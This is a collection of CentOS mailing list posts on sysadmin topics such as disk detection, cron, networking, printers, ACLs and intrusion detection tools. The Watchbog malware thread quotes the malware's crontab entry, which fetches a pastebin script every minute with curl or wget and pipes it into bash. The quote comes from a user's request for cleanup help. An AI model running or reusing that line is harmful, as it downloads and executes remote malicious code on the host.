https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Centos installer not detecting hard drive

[Leroy Tennison]

This may be a remote possibility because it happened to me long ago but, were 
these disks used for something else previously?  I had a situation where 
something "special" a program did on the disk caused Linux to not recognize the 
drive.  In that case I was able to use the manufacturer's "restore the drive to 
its original condition" program to remove the problem.  I've also seen other 
situations where using dd to write zeros to the first 10K or so of the drive 
got around problems (if the drive is even recognized...).  If this is your 
situation and the manufacturer doesn't offer a "restore..." program you might 
try other distros' "leading edge" Live CDs to hopefully detect the drive and do 
something with it then install CentOS.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
This message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Farid Izem 

Sent: Tuesday, March 12, 2019 4:16 PM
To: centos@centos.org
Subject: [EXTERNAL] [CentOS] Centos installer not detecting hard drive

Hi,

I have a new labtop and i want to install CentOS 7.6 on it.
My labtop has two hard drives :
- A 256Go SSD
- A standard 1 To hard drive
None of the two hard drives are detected by the Centos installer
consequently i can't proceed with the installation.

If i try with a Fedora server distro, then the standard hard drive is
detected, the SSD one is still not detected.

I do prefer to install Centos as is is the closed Linux version from RHEL,
so what can i do to solve the issue ?

Regards,

Faird
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] HPlip Mark Roth/Jon LaBadie .

[Leroy Tennison]

We've pretty much defined what printer vendors aren't worth considering.  What 
printer manufacturers are good to consider for Linux?  Is the information at 
www.openprinting.org/printers as good as you can get or are other sources 
better?


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
This message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of mark 
Sent: Wednesday, February 27, 2019 1:04 PM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] HPlip Mark Roth/Jon LaBadie .

Valeri Galtsev wrote:
> On 2/27/19 9:16 AM, mark wrote:
>> Ger van Dijck wrote:
>>>
>>> The problems with HPlip goes on and on : I can not manage to
>>> establish a connection on WiFi with the HP4620 : I can print to the
>>> printer but not scan . Running hp-check results in cups is not
>>> running, hplip is not properly (HP) installed , xsane is not installed
>>> etc.. But I can assure you all this software is properly installed :
>>> Hp-check cannot detect the
>>> scanfunction on the HP4620. When running on USB cable all runs fine !
>>>
>>> Maybe Bug 1683312 from Zdenek Dohnal (Red Hat) could be helpfull : I
>>> reported this bug .
>>>
>>> Hp does not support Unix/Linux applications ! Are they really so
>>> stupid to think that the world excist by MS and all other users do not
>>> need support:
>>> Arrogance or stupidity ?
>>>
>> The inheritance of Carly. I was on the phone yesterday to HP - we just
>> bought this  printer, and it's under warranty. The engineer I spoke
>> with told me he'd been there since '99, and he could tell me how to
>> dissassemble and rebuild this brand new poster printer in his sleep. He
>>  does not, however, know software When I mentioned that HP has
>> support in '12 for Macs - I was hoping to get the .ppd from the Mac
>> package, as we had for the z3200ps in '12 - he told me they'd gotten rid
>> of the Mac support team.
>>
>> Yes: no software support.
>>
> 
>
> I figure, I will add some rant about HP printer department.
>
> But first of all, I have to tell how great HP printer department was in
> the past. The past in my book is some 5 years ago and before that. About
> decade ago Xerox went really bad. They started making small changes to
> models, so tones were not compatible between them, thus they got rid of
> 3rd party vendors selling "compatible" toners for their printers (who
> will start production for something that covers only small number of
> potential customers). I didn't see an indication of really bad thing then,
> but some 5 years down the road they stopped making supplies for their
> printers, and no "compatibles" were being produced by anybody. So, all
> Xerox printers 5 years young (I hate to use word "old" here) were
> just junk. That day I said: I will never buy any Xerox anything, period.
> Yes I still agree with their old motto saying that they taught the world
> how to copy.
>
> By that time we also had a bunch of HP printers, and we happily kept
> getting newer models of HP printers. As a great example I would mention:
> about a year ago I almost retired HP LaserJet 4050 (b/w printer), that was
> heavily used in the Department for about 15 years, still working, still
> making prints of great quality, supplies for which still were produced by
> HP. So, HP was my life saver as far as printers go.
>
>
> Now finally to the rant: I recently started having issues, or rather
> single issue (jam of duplex jobs) with two of HP Color LaserJet CP4525
> printers. Two, not just one. And now that I'm trying to find RELIABLE
> enterprise level printer for the department, I can not. It sounds like
> models HP manufacture now are not reliable. A few reliable ones were just
> discontinued recently. So, I'm dead in the water: what next printer to get
> for the department where it is used heavily? (yes, I included 

[CentOS] dont run cron.d- when cron.daily-scripts are running

[Leroy Tennison]

Well, this is anything but elegant, but if your daily occurs at an exact hour 
and minute you could write two series of per minute cron jobs (a "before' and 
an "after") avoiding that minute.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
This message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Leon Fauster via CentOS 

Sent: Tuesday, February 12, 2019 6:57 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] dont run cron.d- when cron.daily-scripts are 
running

EL6 context:
cronie-1.4.4-16.el6_8.2.x86_64
cronie-anacron-1.4.4-16.el6_8.2.x86_64
crontabs-1.10-33.el6.noarch

I have some cron.d entries that execute scripts in minute intervals and I'm 
wondering how could an
"official" way look like, to have a condition to not run cron.d entries when 
cron.daily scripts are
running. Sure, I can hack something around file timestamps or so but that feels 
not so streamlined ...

I'd really appreciate any ideas ...

--
LF


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] netmask on aliases overriden by netmask on interface

[Leroy Tennison]

Just a cautionary note, if you use snmpd you may start seeing regular "ia_addr 
insert" errors using this approach depending on your version of snmpd and how 
reporting is configured.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
This message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Ulf Volmer 

Sent: Friday, February 8, 2019 11:48 AM
To: centos@centos.org
Subject: [EXTERNAL] Re: [CentOS] netmask on aliases overriden by netmask on 
interface

On 08.02.19 15:08, James B. Byrne via CentOS wrote:

> # ifconfig eth1:192008001
> eth1:192008001 Link encap:Ethernet  HWaddr 00:25:90:61:74:C1
>   inet addr:192.168.8.1  Bcast:192.168.8.255
> Mask:255.255.255.128
>   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
>   Interrupt:17 Memory:feae-feb0
>
> Which shows that the network mask is determined by the interface mask
> and is not overridden by the alias definition.
>
> Is this expected behaviour?  Does this mean that a particular physical
> interface cannot belong to more than one network, or at least not to
> networks having differing cidr masks?

Interface aliases are evil from my point of view. I recommend to
configure the ip directly to the interface.

#ifcfg-eth2
[...]
IPADDR=192.168.200.1
NETMASK=255.255.255.0
IPADDR2=192.168.201.1
NETMASK2=255.255.255.192

ip addr show dev eth2
4: eth2:  mtu 1500 qdisc pfifo_fast
state UP qlen 1000
link/ether 08:00:27:b0:c5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.200.1/24 brd 192.168.200.255 scope global eth2
inet 192.168.201.1/26 brd 192.168.201.63 scope global eth2
inet6 fe80::a00:27ff:feb0:c57c/64 scope link
   valid_lft forever preferred_lft forever

Best regards
Ulf
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] thunderbird & firefox

[Leroy Tennison]

Anybody used Trinity?  I'm seriously thinking about abandoning KDE.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of mark 
Sent: Friday, January 4, 2019 5:32 PM
To: CentOS mailing list
Subject: [EXTERNAL] Re: [CentOS] thunderbird & firefox

Alice Wonder wrote:
> On 1/4/19 8:28 AM, mark wrote:
>
>> I *really* dislike the new photon UI. I WANT the arrow buttons top and
>> bottom of the scrollbars.
>>
>> Does anyone know how to bring them back, or is that "that's *sooo* last
>>  year, you can't ever have them again"?
>>
> Switch to Mate and they are there.

I used to like IceWM... but I'm at work and people run either kde or
gnome, so I've got to support them.

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] recording session

[Leroy Tennison]

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.

-Original Message-
From: CentOS  On Behalf Of Ilyass Kaouam
Sent: Thursday, December 27, 2018 9:45 AM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] recording session

Hi,

Please if you know any opensource tools he can recording session ?
Freeipa can do this ?

Thank's

--
*Ilyass kaouam*
*Ingénieur System OpenSource*
*Mastère européen Manager de Projets Informatiques* 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

You need to be more specific, what kind of session are you wanting to record 
and what do you want recorded about that session.  Sudo logging has the ability 
to record everything (including timing) about a sudo session.  The script 
utility can record all or a part of a terminal session.  Be aware that escape 
sequences are recorded as well making re-use (particularly with script) 
challenging.  If you need something different then reply defining that need 
much more specifically, do you need just session start and end times, keystroke 
logging, what?
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

[Leroy Tennison]

(Apologies in advance: "To top/middle/bottom post, that is the question")  In 
regard to "Search for "linux intrusion detection tools".", I have used Aide 
(Advanced Intrusion Detection System) and OSSEC, I'm aware of Samhain as well.  
If anyone has experience with Samhain I would love to hear about it.

These systems have their advantages and disadvantages:

Aide - Pro: very granular, reasonably easy to use, no library dependencies.  
Motivated by tripwire but actively maintained (which the free tripwire isn't to 
the best of my knowledge).  Cons: not a daemon, if "it" can be done and totally 
undone between scans then it's transparent to Aide.  Another con, somehow the 
executable, its database and configuration have to be protected against attack 
but everything is locally installed - a real challenge.

OSSEC - Pro: a daemon, also monitors logs.  Cons: Even though it's a daemon, 
checks are scheduled - same issue as above.  Another con: False positives, 
particularly if "new file detection" is used.  And, like Aide, the agent and 
configuration are locally installed.

Issues for all:
Learning curve: After installing Aide the first thing I learned was how much 
change the operating system was making as a part of normal operations.  In some 
ways a good education but it leads to the next dilemma.

What do you monitor?  If you monitor changing files you may be inundated with 
alerts.  If you don't monitor then how do you protect yourself?  Beyond 
/etc/shadow and database files there are more exotic (and thus more difficult 
to analyze) situations.  As an example, we were using both OSSEC and Aide on a 
system and, on occasion, Aide would alert that /etc/hosts.deny had an updated 
modification timestamp but no change in the file.  Using auditd (which has its 
own limitations) I finally discovered that OSSEC was updating hosts.deny with 
IP addresses of systems it detected were trying to do malicious things but then 
removing the entry 10 minutes later - a "hamper the attack" technique.  In 
another case icinga (the server side) was creating temporary files as a part of 
its monitoring.  However, they were being created and removed so fast that 
OSSEC detected the creation but the file was gone on its almost immediate next 
check causing it to report a possible rootkit (file exists but OS t
 ools don't find it).  Fortunately I was able to capture a similar file and 
examine its contents.

The resource dilemma: Continuous monitoring can be resource intensive, can you 
accept that?  If not, how frequent a monitoring is enough.



Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.

-Original Message-
From: CentOS  On Behalf Of Pete Biggs
Sent: Monday, December 17, 2018 3:58 PM
To: centos@centos.org
Subject: [EXTERNAL] Re: [CentOS] CentOS 7.5 Linux box got infected with 
Watchbog malware


> Is there a way to find out how the CentOS 7.5 Linux box got infected
> with malware?
> Currently i am referring to
> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
> areransomware.html to carry out the below steps and is done manually.
>
> 1)rm -fr /tmp/*timesyncc.service*
> 2)crontab -e -u apigee
> delete the cron entry
> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 3)ps aux |
> grep watchbog kill -9 pidof watchbog
>
> Any suggestions or recommendations to find out how CentOS 7.5 Linux
> box got infected with Watchbog Malware.

Well, if the infected crontab is owned by user 'apigee' then it would suggest 
that whatever runs as that user is the source of the infection.
The malware appears to try to elevate its privs, and if it's successful it 
modifies various system files.  What you are seeing in the 'apigee'
crontab is just the tip of the iceberg.

It is unlikely that what is in that blog will successfully get rid of all the 
malware - it will probably stop it running, but your system will still have the 
malware on it and it may have left other backdoors into your system.

The *ONL

[CentOS] Running a command at startup

[Leroy Tennison]

Does your version of CentOS have the @reboot crontab option?  If it does this 
is probably easier unless you want to learn how to write systemd files.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Robert Moskowitz 

Sent: Wednesday, December 12, 2018 6:04 PM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] Running a command at startup

On a support forum, I was told that to turn off my board's blue led run:

echo none | sudo tee /sys/class/leds/blue\:heartbeat/trigger

Well, this does not survive a system reboot.  So I was told:

Add the off bit to

 /etc/rc.local

Add it above "exit 0"

So of course, CentOS is past using rc.local and recommends:

# It is highly advisable to create own systemd services or udev rules
# to run scripts during boot instead of using this fi

So can someone point me to how to make this into a simple systemd service?

thanks


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] CentOS 7.6 external USB dmesg issue

[Leroy Tennison]

Do you have any "history" with the adapter you connected them to?  If not 
consider it as a possibility as well (from bad experience of total 
filesystem/partition corruption on two hard drives only to discover it was 
something on the motherboard).


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Jerry Geis 

Sent: Wednesday, December 12, 2018 7:49 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] CentOS 7.6 external USB dmesg issue

I have a brand new 2T external Samsung SSD disk. (two of them) for backup.

I tried the first one and had an issue, I tried the second one and got the
same issue.

Am I doing something wrong ? I find it hard to believe the SSD (both) are
bad.

I plugged in the USB 3.1 adapter, I fdisk /dev/sdd, n, p, default, default,
w.
then mkfs.ext4 -j /dev/sdd1, then just mount and rsync.

[ 1085.193710]  [] ? account_entity_dequeue+0xae/0xd0
[ 1085.193715]  [] schedule+0x29/0x70
[ 1085.193719]  [] schedule_timeout+0x221/0x2d0
[ 1085.193724]  [] ? __switch_to+0x151/0x580
[ 1085.193730]  [] ? ktime_get_ts64+0x52/0xf0
[ 1085.193735]  [] io_schedule_timeout+0xad/0x130
[ 1085.193740]  [] ? prepare_to_wait_exclusive+0x56/0x90
[ 1085.193744]  [] io_schedule+0x18/0x20
[ 1085.193750]  [] get_request+0x243/0x7d0
[ 1085.193756]  [] ? __radix_tree_create+0x11/0x360
[ 1085.193761]  [] ? wake_up_atomic_t+0x30/0x30
[ 1085.193767]  [] blk_queue_bio+0xfe/0x400
[ 1085.193772]  [] generic_make_request+0x147/0x380
[ 1085.193778]  [] submit_bio+0x70/0x150
[ 1085.193786]  [] ? bio_alloc_bioset+0x115/0x310
[ 1085.193791]  [] _submit_bh+0x127/0x160
[ 1085.193797]  [] submit_bh+0x10/0x20
[ 1085.193808]  []
ext4_read_block_bitmap_nowait+0x4c4/0x640 [ext4]
[ 1085.193828]  [] ext4_mb_init_cache+0x181/0x6e0 [ext4]
[ 1085.193834]  [] ? lru_cache_add+0xe/0x10
[ 1085.193840]  [] ? find_or_create_page+0x5e/0xa0
[ 1085.193858]  [] ext4_mb_init_group+0x126/0x230 [ext4]
[ 1085.193874]  [] ext4_mb_good_group+0x184/0x1a0 [ext4]
[ 1085.193889]  [] ext4_mb_regular_allocator+0x1c5/0x470
[ext4]
[ 1085.193906]  [] ? __ext4_journal_stop+0x3c/0xb0 [ext4]
[ 1085.193921]  [] ?
ext4_mb_normalize_request+0x20c/0x560 [ext4]
[ 1085.193936]  [] ext4_mb_new_blocks+0x65b/0xa20 [ext4]
[ 1085.193942]  [] ? __getblk+0x2d/0x300
[ 1085.193961]  [] ext4_ind_map_blocks+0xb9b/0xc20 [ext4]
[ 1085.193968]  [] ? hrtimer_cancel+0x28/0x40
[ 1085.193973]  [] ? zone_statistics+0x88/0xa0
[ 1085.193987]  [] ext4_map_blocks+0x295/0x6e0 [ext4]
[ 1085.193993]  [] ? do_select+0x73e/0x7c0
[ 1085.193999]  [] ? kmem_cache_alloc+0x1c2/0x1f0
[ 1085.194006]  [] ? alloc_buffer_head+0x21/0x60
[ 1085.194018]  [] _ext4_get_block+0x1df/0x220 [ext4]
[ 1085.194030]  [] ext4_get_block+0x16/0x20 [ext4]
[ 1085.194036]  [] __block_write_begin_int+0x198/0x5f0
[ 1085.194041]  [] ? kmem_cache_alloc+0x1c2/0x1f0
[ 1085.194053]  [] ? _ext4_get_block+0x220/0x220 [ext4]
[ 1085.194067]  [] ? ext4_write_begin+0x116/0x440 [ext4]
[ 1085.194073]  [] __block_write_begin+0x11/0x20
[ 1085.194085]  [] ext4_write_begin+0x18f/0x440 [ext4]
[ 1085.194091]  [] generic_file_buffered_write+0x124/0x2c0
[ 1085.194098]  [] __generic_file_aio_write+0x1e2/0x400
[ 1085.194105]  [] generic_file_aio_write+0x59/0xa0
[ 1085.194116]  [] ext4_file_write+0xd2/0x1e0 [ext4]
[ 1085.194121]  [] do_sync_write+0x93/0xe0
[ 1085.194127]  [] vfs_write+0xc0/0x1f0
[ 1085.194132]  [] SyS_write+0x7f/0xf0
[ 1085.194138]  [] system_call_fastpath+0x22/0x27

Thanks,

Jerry
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Tools/mechanisms for the management of access permissions in big filebased datasets

[Leroy Tennison]

Well, there are extended ACLs if they're available in CentOS, when I first 
worked with them (long ago) they were new (and on a different Distro).  I hope 
support for them has improved.  They allow multiple users/groups to be assigned 
permissions to a file/directory.  The problem then was that chmod (and other 
programs) were not extended-ACL-aware and could over-ride extended ACLs.  There 
was a mechanism to recover from the situation but what it basically came down 
to was eternal vigilance - the system administrators had to understand (and 
agree about) extended ACLs and be careful/diligent in applying them.  There are 
hacks which could possibly help (rename chmod and replace it with a script 
warning about extended ACLs) but, in the final analysis, it's not a decision to 
be undertaken lightly (unless the situation has changed dramatically).


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Frank Thommen 

Sent: Tuesday, November 27, 2018 7:25 AM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] Tools/mechanisms for the management of access 
permissions in big filebased datasets

Hello,

we are currently managing access permissions through classical
user-group-others permissions on a multi-petabyte directory tree with
partially very deep and broad directories.  Projects are represented by
directory trees and mapped through GIDs.  Lately we had lots of
"singular" permission request (one single user needs access to a single
dataset but should not be able to see all other datasets belonging to
the same project).  We realized, that the UGO model doesn't scale and is
becoming more and more unmanageable.

Can you recommend tools/mechanisms/technologies to overcome the
drawbacks of the UGO model?  We are thinking about some purely ACL based
mechanism (but are open to other ideas).  All filesystems in question
are mounted via NFSv4 and the clients are (almost) completely CentOS 7.x
hsots.  Ideally the tool would have some web UI and some kind of
(REST)API which allows us to modify permissions from our inhouse data
management application (which does /not/ manage permissions, just the
structure of the data).  Additionally it should be able to
visualize/report permissions in directory.

I wasn't very successful in googling possible candidates, hence the
question to the list.

Cheers
frank


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] CentOS 7 bash perhaps off topic

[Leroy Tennison]

If I'm understanding you corectly, you want smwebsocket to continuously pull 
data passing it to grep for filtering and ultimately to myprogram to update a 
database.  If that's correct I haven't had an opportunity to work with that but 
my current understanding of how pipelining works is that smwebsocket would 
retrieve $URL (which would be a finite amount of data), it would end sending 
output to grep which would filter it (and end) sending its output to the while 
loop around myprogram which would process it until there was no more data (and 
end) thus landing at 'sleep 60' only to start over again.  If a pipeline is 
capable of continuous processing I'm not aware of it (but would be glad to know 
that's how it can work).


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Jerry Geis 

Sent: Monday, November 26, 2018 2:11 PM
To: CentOS mailing list
Subject: [EXTERNAL] [CentOS] CentOS 7 bash perhaps off topic

hi all,

I have a small script that seems to be exiting and hitting the sleep 60...
The smwebsocket just connects to the web socket provided and outputs the
data. This works manually.

the myprogram just opens a database and writes the line...

My desire is to run the smwebsocket, connect to the websocket and output
the data (line by line) when we get a line that matches Location take that
line and output to the database. Seems simple. I desire this to keep the
connection alive and just continue to read data and grep on the data etc...
if smwebsocket does exit, sleep 60 and reconnect.

However it seems to be exiting and running the sleep 60. Am I missing
something ?

while [ 1 ]
do
smwebsocket "$URL" | grep Location | while read line
do
myprogram -data "$line"
done

sleep 60
Reconnecting...
done

All the pieces work - just not the actual running.  What am I missing?

Jerry
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Upping my game on web work

[Leroy Tennison]

Given your situation I would consider carefully crafting the html yourself 
(frames for content, etc) and specifying constraints for them (for example: not 
changing an image's size and saving any file for use without line feeds) such 
that file replacement was all that is needed.  For someone who isn't 
technically trained (your end user apparently), turning them loose with any 
HTML editor is equivalent to handing a scalpel to a child.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Robert Moskowitz 

Sent: Wednesday, November 21, 2018 10:07 AM
To: CentOS mailing list; mark
Subject: [EXTERNAL] Re: [CentOS] Upping my game on web work

On 11/21/18 10:26 AM, mark wrote:
> Frank Cox wrote:
>> On Wed, 21 Nov 2018 09:02:38 -0500
>> Robert Moskowitz wrote:
>>
>>> What 'simple' web support tools do we have here?
>> Libreoffice can create a html page from a word processor document.
>>
>> I've done that a few times where I do the basic layout with libreoffice
>> and then hand-edit the html to fine tune it.  But my web pages aren't
>> usually anything exceptionally fancy.
>>
> No word processor produces anything but absolute 100% pure crap HTML.
> Every single line has every possible option, and a few extras.
>
> The one HTML editor I ever tried, Quanta, had the lovely habit of, once
> you hit ?display", when you went back to editing, it has left justified
> *every* *line*.
>
> I hate to suggest it, but something like WordPress might be what you want,
> if that's not overkill.
>
>mark "my web pages proudly built in vi"

I  can make the basic pages, but they need to tools to upload content.
Recordings, announcements (in pdf) and the like.  So something more than
here is how to compose your html and here is SSH to do a scp file
transfer

I will look at docuwiki and perhaps WordPress (seem to recall it is more
than just an html editor).


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Upping my game on web work

[Leroy Tennison]

There are several options, Mozilla had/has SeaMonkey, w3c has Amaya, there's 
Bluefish and Kompozer, search the web for 'html web editor linux' - you'll find 
more than enough options.  I've used Amaya and Kompozer, they're adequate but 
you still need to be able to write your own html.  I've used OpenOffice and it 
produces pretty bloated results, seems everyone is interested  in creating 
sophisticated, complex html rather than just getting the job done.


Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com
TThis message has been sent on behalf
of a company that is part of the Harris Operating Group of
Constellation Software Inc. These companies are listed
here
.
If you prefer not to be contacted by Harris
Operating Group
please notify us
.
This message is intended exclusively for the
individual or entity to which it is addressed. This communication
may contain information that is proprietary, privileged or
confidential or otherwise legally exempt from disclosure. If you are
not the named addressee, you are not authorized to read, print,
retain, copy or disseminate this message or any part of it. If you
have received this message in error, please notify the sender
immediately by e-mail and delete all copies of the
message.


From: CentOS  on behalf of Robert Moskowitz 

Sent: Wednesday, November 21, 2018 8:23 AM
To: CentOS mailing list; Frank Cox
